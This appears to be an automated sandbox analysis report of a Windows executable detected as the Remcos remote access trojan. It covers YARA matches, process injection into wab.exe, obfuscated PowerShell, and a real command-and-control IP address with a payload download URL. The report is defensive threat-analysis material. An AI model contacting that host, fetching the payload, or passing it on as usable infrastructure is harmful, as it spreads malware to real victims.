Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx, 0_2_004036D7

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 3844, type: MEMORYSTR

Remote Access Functionality
barindex
Detected Remcos RAT
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-UI3GST Jump to behavior
Yara detected Remcos RAT
Source: Yara match File source: 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 3844, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1431846 Sample: Q20240425 MAX5073626.com.exe Startdate: 25/04/2024 Architecture: WINDOWS Score: 100 31 Found malware configuration 2->31 33 Antivirus detection for URL or domain 2->33 35 Multi AV Scanner detection for dropped file 2->35 37 7 other signatures 2->37 7 Q20240425 MAX5073626.com.exe 2 27 2->7         started        process3 file4 23 C:\Users\user\...\dannelsestrinnet.Sta, ASCII 7->23 dropped 39 Suspicious powershell command line found 7->39 11 powershell.exe 20 7->11         started        signatures5 process6 file7 25 C:\Users\...\Q20240425 MAX5073626.com.exe, PE32 11->25 dropped 41 Obfuscated command line found 11->41 43 Writes to foreign memory regions 11->43 45 Found suspicious powershell code related to unpacking or dynamic code loading 11->45 47 Powershell drops PE file 11->47 15 wab.exe 3 6 11->15         started        19 conhost.exe 11->19         started        21 cmd.exe 1 11->21         started        signatures8 process9 dnsIp10 27 193.239.86.203, 2700, 3702, 4089 MERITAPL Romania 15->27 29 Detected Remcos RAT 15->29 signatures11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
193.239.86.203
 unknown Romania
35215 MERITAPL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
193.239.86.203 true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://193.239.86.203/XWJPh99.bin true
  • Avira URL Cloud: safe
 unknown